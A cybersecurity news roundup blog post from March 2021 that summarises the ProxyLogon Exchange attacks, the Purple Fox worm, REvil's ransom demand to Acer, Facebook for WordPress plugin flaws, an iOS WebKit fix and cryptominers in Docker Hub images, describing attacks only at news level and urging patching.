CYBERSECURITY NEWS V. March – Microsoft Exchange Server hack, Purple Fox, RCE vulnerability in Facebook


hexway cybersecurity blog brings you the latest news about attacks and data breaches, emerging malware, and vendor security updates

News FYI

Massive Microsoft Exchange Server hack

The attacks began in early January 2021 and escalated into a large-scale hacking campaign. The attackers exploit four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server. According to Microsoft, the prime suspect is the Chinese government-sponsored Hafnium hacker group.

On March 2, 2021, Microsoft announced vulnerabilities in the Exchange Server email service used by private businesses and government agencies. The company has released emergency security updates for four versions of Exchange: 2010, 2013, 2016, and 2019. By March 5, only 10% of the affected devices were updated.

Four vulnerabilities in the Exchange mail server, which the researchers dubbed ProxyLogon, can be chained and exploited to authenticate on the Exchange server, gain administrator rights, install malware, and steal data. An attack has three stages. The first one is to gain access to the Exchange server using stolen passwords or by exploiting undiscovered vulnerabilities. Next, a web shell is created to enable remote control over the compromised server. Finally, data can be stolen through remote access.

More than 60,000 companies and organizations worldwide were attacked because of the vulnerabilities in Microsoft Exchange Server. In the United States alone, the number of victims amounts to at least 30,000.

Many countries worldwide have issued national security alerts warning about the threat and asking everyone to install patches as soon as possible. Currently, the number of unpatched Exchange Servers worldwide exceeds 125,000. In addition to the usual patches, Microsoft engineers prepared security updates for old and unsupported versions of Exchange and released a special PowerShell script designed to test Exchange servers.

Another problem is the backdoors left by hackers: patches can close entry points, but they cannot help the organizations already attacked.

Purple Fox malware spreads across Windows devices

The Purple Fox malware has been updated and can now spread among Windows machines like a worm.

It was first identified in 2018 after 30,000 devices had been infected. It is most commonly used as a downloader for other malware. In the past, Purple Fox also targeted Windows systems and usually infected them through browsers by exploiting memory corruption and privilege escalation vulnerabilities.

Purple Fox employs a new spreading technique: indiscriminate port scanning and leveraging of open SMB services with weak passwords and hashes. After detecting a vulnerable Windows system accessible via the Internet, the worm module is activated to brute-force SMB passwords. Nevertheless, it still uses old methods like phishing emails and browser vulnerabilities.

Purple Fox blocks several ports (445, 139, and 135) to prevent the infected machine from being reinfected or used by another attacker. Before restarting the infected device, Purple Fox installs an open-source rootkit to hide deleted files, folders, and Windows registry entries created by it. After rebooting the device, it renames its payload DLL to match the Windows system DLL and configures it to run at the system startup. Subsequently, when the malware is launched, the infected machine acts like a worm, constantly scanning the Internet for other targets, trying to compromise and add them to the botnet.

Since May 2020, the number of attacks has increased by about 600%; to date, there are 90,000 recorded incidents.

Acer attacked, hackers demand $ 50 million

The REvil group attacked Acer and demanded a ransom of $ 50 million. They provided a partial list of compromised data, including financial statements, bank credit accounts, other financial documents, and employee information.

A representative of Acer spoke with REvil on March 14. For the ransom, the group has promised to remove the stolen files and disclose the vulnerability that allowed them to attack Acer servers.

It is the largest ransom to date. REvil has already offered to reduce the ransom by 20% in case of timely payment.

Critical RCE vulnerability patched in Facebook

Two dangerous vulnerabilities were fixed in the Facebook WordPress extension, one of them with a score of 9 on the CVSS scale. It allows injecting malicious PHP code into a website and executing it remotely.

At the end of December, a critical vulnerability was discovered in Facebook for WordPress. It’s related to deserialization that occurs when the run_action () function is executed. The vulnerability (CVE-2021-24217) allows bypassing authentication, uploading arbitrary files to the site, and executing malicious code. The problem is present in Facebook for WordPress versions 2.2.2 and below; the developers fixed it in early January by releasing the plugin’s version 3.0.0.

Another one (CVE-2021-24218, CVSS score of 8.8), found on January 27, is a cross-site request forgery (CSRF) vulnerability that can be used in an XSS attack. According to Wordfence, it was introduced with the release of version 3 of the plugin. In preparation for rebranding, the developers rewrote most of the code and expanded the functionality, enabling AJAX when saving changes to the Facebook for WordPress settings. Intended to improve the plugin’s integration, the new implementation turned out to be flawed. As a result, it was possible to change the settings by pointing to the user's console and steal the site’s metric data. An attacker would have to trick the admin into performing the desired action after authorization. 

Moreover, since the settings are not sanitized, an attacker could add malicious JavaScript to the values, which would be executed in the administrator's browser upon entering the settings page. Using this script, it is possible to inject a backdoor or create a new administrator account to control the site. This CSRF/XSS vulnerability affects the plugin versions from 3.0.0 to 3.0.3. The developer fixed it in two steps last month; the full patch comes in version 3.0.4 (3.0.5 being the latest).

Apple fixes actively exploited vulnerability in iOS

Apple has released security updates for iPhone, iPad, iPod, and Apple Watch, addressing an actively exploited vulnerability.

Google Threat Analysis Group discovered the vulnerability (CVE-2021-1879). It affects the Webkit browser engine and allows XSS attacks. An attacker would have to trick the victim into opening malicious web content on the device. Affected devices include Phone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, iPod touch (7th generation), iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, iPod touch (6th generation), Apple Watch Series 3 and later. CVE-2021-1879 has been fixed in the iOS 14.4.2, iOS 12.5.2, and watchOS 7.3.3 releases. Users are advised to install the updates as soon as possible.

Apple or Google disclosed no detailed information about CVE-2021-1879.

Earlier this month, Apple released the iOS 14.4.1 emergency software update for all iPhone users. It was released without prior testing on a Monday, while the company usually releases new firmware on Tuesdays.

The vulnerability CVE-2021-1844 in Apple WebKit, which powers the Safari browser, could lead to arbitrary code execution.

So far, there is no information about it being exploited by hackers.

Cryptominers found in popular images on Docker Hub

Cryptocurrency miners were found in 30 containers with over 20 million downloads. The images were uploaded from 10 different accounts. In most cases, attackers mined Monero, with XMRig being the most preferred tool for this purpose. However, some malicious activities were aimed at mining Grin (GRIN) or ARO (Aronium).

The attackers were able to extract about $ 200,000 worth of cryptocurrency.

Docker Hub is the largest containerized application library, which allows companies to share images internally or with their customers and developers to distribute open-source projects.

red team

Try Hive now

online demo
red team